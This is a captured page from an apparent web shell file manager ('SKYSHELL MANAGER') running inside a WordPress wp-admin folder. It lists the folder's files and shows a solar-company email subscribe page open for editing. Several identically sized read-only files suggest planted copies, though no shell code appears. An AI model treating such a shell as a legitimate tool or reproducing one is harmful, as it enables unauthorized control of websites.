📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-advanced.php
28.79 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-tags.php
21.98 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tools.php
3.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets.php
1.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: subscribe.php
<!DOCTYPE html> <!--[if lt IE 7]><html class="no-js lt-ie10 lt-ie9 lt-ie8 lt-ie7"> <![endif]--> <!--[if IE 7]><html class="no-js lt-ie10 lt-ie9 lt-ie8"> <![endif]--> <!--[if IE 8]><html class="no-js lt-ie10 lt-ie9"> <![endif]--> <!--[if IE 9]><html class="no-js lt-ie10"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js"> <!--<![endif]--> <head> <!-- Basic Page Needs --> <meta charset="utf-8"> <title>Finesolartools</title> <meta name="description" content=""> <meta name="author" content=""> <!-- Mobile Specific Metas --> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <!-- Favicons --> <link rel="shortcut icon" href="content/ski/images/favicon.ico"> <style> body { margin: 0; font-family: Arial, sans-serif; background: linear-gradient(135deg, #0b1a4a, #1a2b6d); display: flex; align-items: center; justify-content: center; } /* Full section */ .subscribe-full { width: 100%; min-height: 320px; display: flex; align-items: center; justify-content: center; text-align: center; padding: 60px 20px; background: linear-gradient(135deg, #0b1a4a, #1a2b6d); color: #fff; } /* Content */ .subscribe-content { max-width: 700px; width: 100%; } .subscribe-content h2 { font-size: 30px; margin-bottom: 10px; } .subscribe-content p { font-size: 15px; margin-bottom: 30px; line-height: 1.6; color: #dcdcdc; } /* Form */ .subscribe-form { display: flex; max-width: 480px; margin: 0 auto; background: #fff; border-radius: 50px; overflow: hidden; box-shadow: 0 10px 25px rgba(0,0,0,0.2); } /* Input */ .subscribe-form input { flex: 1; padding: 15px 18px; border: none; outline: none; font-size: 14px; } /* Button */ .subscribe-form button { padding: 15px 28px; border: none; background: #c9030c; color: #fff; font-weight: 600; cursor: pointer; transition: 0.3s; } /* Hover effect */ .subscribe-form button:hover { transform: scale(1.05); } /* Focus effect */ .subscribe-form input:focus { background: #f9f9f9; } /* Mobile */ @media (max-width: 480px) { .subscribe-form { flex-direction: column; border-radius: 12px; } .subscribe-form input { border-bottom: 1px solid #eee; } .subscribe-form button { width: 100%; } .subscribe-content h2 { font-size: 22px; } } </style> </head> <body> <section class="subscribe-full"> <div class="subscribe-content"> <div style="background-color: #fdfdfd;padding: 15px;"><a href="index.php"><img src="content/ski/images/solar.png" /></a></div> <h1 style="font-size: 48px;">Our Subscribe form</h1> <h2>Power Your Future with Solar Energy</h2> <p>Get the latest updates on solar installations, energy savings, and exclusive offers from Finesolartools. Start your journey towards a greener tomorrow today.</p> <form class="subscribe-form" method="post" id="sub"> <input type="email" name="email" placeholder="Enter your email address" required> <button type="submit" name="submit">Subscribe</button> </form> <div id="loader" style="display:none;color: #ffffff;padding-top: 10px;">Processing...</div> <div id="responseMessage" style="color: #ffffff;padding-top: 10px;"></div> <script> document.getElementById("sub").addEventListener("submit", function(event) { event.preventDefault(); let form = this; let formData = new FormData(form); // Show loader document.getElementById("loader").style.display = "block"; document.getElementById("responseMessage").innerText = ""; fetch("sub.php", { method: "POST", body: formData }) .then(response => response.text()) .then(data => { // Hide loader document.getElementById("loader").style.display = "none"; // Display server message document.getElementById("responseMessage").innerText = data.trim(); // Clear email field form.reset(); }) .catch(error => { document.getElementById("loader").style.display = "none"; document.getElementById("responseMessage").innerText = "An error occurred."; }); }); </script> <div style="background-color: #fdfdfd;padding: 1px;margin-top:60px;"></div> <a href="index.php" style="display: flex;align-items: center;justify-content: center;color: #ffffff;margin-top:60px;">back to home</a> </div> </section> </body> </html>
Save